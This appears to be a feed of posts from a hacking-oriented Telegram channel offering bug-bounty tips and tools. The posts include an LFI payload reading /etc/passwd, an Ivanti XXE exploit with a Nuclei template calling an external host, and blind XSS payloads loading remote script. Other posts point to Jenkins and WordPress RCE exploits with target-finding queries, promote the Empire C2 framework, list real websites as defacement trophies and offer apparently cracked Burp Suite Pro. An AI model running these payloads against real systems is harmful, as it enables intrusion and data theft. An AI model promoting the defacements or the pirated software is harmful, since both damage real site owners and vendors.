👋 LFI Payload 👋

Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#bugbountytips #bugbounty #CyberSecurity
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

CVE-2024-22024

XXE on Ivanti Connect Secure

☠️ payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>

send it to:
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#bugbountytips #cve #Ivanti
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

JSON Smuggling: A far-fetched intrusion detection evasion technique

🔗 Medium

#infosec #cybersecurity #blueteam
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Nuclei PoC for Ivanti XXE (CVE-2024-22024)

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  denoscription: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: "connect_secure"
    shodan-query: "html:\"welcome.cgi?p=logo\""
  tags: cve,cve2024,kev,xxe,ivanti

variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a0046304402206a39800bff0d9ca85a05e3686a0e246f8d5504a38e8501a1d7e8684ae6f2853002205ba7c74bb1f99cacf693e8a5a1cd429dcd7e52fab188beb8c95b934e4aabcd57:922c64590222798bb761d5b6d8e72950

#Nuclei #Templates #PoC #XXE
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🥩 PDF

#Wordlist #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://www.sergiocardozo.paineladvocacia.com/
http://acesso.paineladvocacia.com/
https://maioranoadvocacia.com/
http://smart.wecaninfotech.com/
https://tropicanarestaurants.com/index.php
https://madein.az/index.html

👁‍🗨 Mirror-h

Country: 🇺🇸🇹🇭

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👑 Empire 👑

💬
Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers. The Empire server is written in Python 3 and is modular to allow operator flexibility. Empire comes built-in with a client that can be used remotely to access the server. There is also a GUI available for remotely accessing the Empire server, Starkiller.

📊 Features:
⚪️ Server/Client Architecture for Multiplayer Support
⚪️ Supports GUI & CLI Clients
⚪️ Fully encrypted communications
⚪️ HTTP/S, Malleable HTTP, OneDrive, Dropbox, and PHP Listeners
⚪️ Massive library (400+) of supported tools in PowerShell, C#, & Python
⚪️ Donut Integration for shellcode generation
⚪️ Modular plugin interface for custom server features
⚪️ Flexible module interface for adding new tools
⚪️ Integrated obfuscation using ConfuserEx 2 & Invoke-Obfuscation
⚪️ In-memory .NET assembly execution
⚪️ Customizable Bypasses
⚪️ JA3/S and JARM Evasion
⚪️ MITRE ATT&CK Integration
⚪️ Integrated Roslyn compiler (Thanks to Covenant)
⚪️ Docker, Kali, ParrotOS, Ubuntu 20.04/22.04, and Debian 10/11/12 Install Support

🔼 Install:

cd Empire
./setup/checkout-latest-tag.sh
./setup/install.sh

😸 Github

#Hacktoberfest #C2 #Redteam #Infrastructure
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

Adding 2 new blind XSS payloads to the XSS scanner payload vault 😎

'"><Svg Src=//{CANARY_TOKEN}/s OnLoad=import(this.getAttribute('src')+0)>

AND

'"><Img Src=//{CANARY_TOKEN}/x Onload=import(src+0)>

#XSS #Bugbounty #Tip
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Linux for Hackers: LINUX commands you need to know

⬇️ Download

#linux #hacker #video
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

👁 Burpsuite Pro 👁

🔥 v2024.1.1.1

🔔 BurpBountyPro_v2.8.0 ➕

📂 README (en+ru) included, plz read it before run BS.

🔼 Run with Java 18 (JDK for Win included)

⬇️ Download
🔒 311138

#Burpsuite #Pro #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🕸 Site:
https://tysonmcguffin.com/index.html
https://bilberrybears.com/
https://flighttouch.com/
https://www.cameratouch.flighttouch.com/
https://mail.flighttouch.com/

👁‍🗨 Mirror-h

Country: 🇺🇸🇪🇸

#Deface
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

✅ H1 asset fetcher ✅

💬
This h1finder.sh is noscript which collect all program names and then collect all assets and save it into wild and non-wild domains

You can get your API key from 👉HackerOne👈

🔼 Installation:

cd h1-asset-fetcher
chmod +x h1finder
mv h1finder /usr/bin/

💻 Usage:

h1finder -t <token> -u <username> -b <true/false>

⚪️ -t = H1 token
⚪️ -u = h1 username
⚪️ -b = true or false, if you want bounty only target set it to true if you want vdp only set it to false

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

‼️ PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks <= 1.9.6 CVSS 9.8 ‼️

Query Fofa: body="/wp-content/themes/bricks/"

📞 PoC
🌐 Nuclei Template

#BugBounty #Tips #Nuclei #Template
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

👺 Free query shodan 1000 result IP "Tips bug bounty" 👺

Example query:
https://shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip

Download source page

Regex:
grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

🦇 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner 🦇

💬 Denoscription:
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.

💻 Usage:
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.

python CVE-2024-23897.py -t <target> -p <port> -f <file>

or

python CVE-2024-23897.py -i <input_file> -f <file>

📊 Parameters:
⚪️ -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.

⚪️ -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).

⚪️ -o or --output-file: Export results to file (optional).

⚪️ -p or --port: Specify the port number. Default is 8080 (optional).

⚪️ -f or --file: Specify the file to read on the target system.

😸 Github

⬇️ Download
🔒 BugCod3

#CVE #PoC #Scanner
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

10000 h1 disclosed reports

💬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
🔒 BugCod3

#Python #H1 #Report
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3

Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 T.me/BugCod3
📣 T.me/LearnExploit

🕸 DigitalOcean OpenVPN/SOCKS for Burp Suite

💬
This Burp extension allows you to spin up a DigitalOcean droplet based on an OpenVPN configuration file. The droplet also functions as a SOCKS5 proxy to allow routing all Burp traffic through the VPN tunnel. The Burp proxy settings are automatically configured to route traffic through the SOCKS5 and OpenVPN droplet.

👁‍🗨 How to use:
🔤 Download the JAR from build/libs/digitalocean-droplet-openvpn-all.jar or build from source yourself;
🔤 Load the extension in Burp via the Extensions tab;
🔤 Create a DigitalOcean API token and enter your token on the extension tab "OpenVPN/SOCKS";
🔤 Select an OpenVPN configurataion file (.ovpn)
🔤 Click "Deploy" to start deploying the SOCKS and OpenVPN containers on a fresh droplet, and the extension will take care of the rest;
🔤 Allow up to a few minutes for the Docker image to complete installation before the proxy starts responding

📊 Features:
⚪️ Remember your DigitalOcean API token;
⚪️ Remember your OpenVPN configuration file and credentials (optional) per project file;
⚪️ Automatically shut down the droplet when Burp closes or the extension is unloaded;
⚪️ A context menu so you can right-click > enable or disable tunnelling through the VPN
⚪️ Opens a Repeater tab to ifconfig.co to easily verify if the VPN is working correctly

😸 Github

⬇️ Download
🔒 BugCod3

#Burp #Extension #bugbounty
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3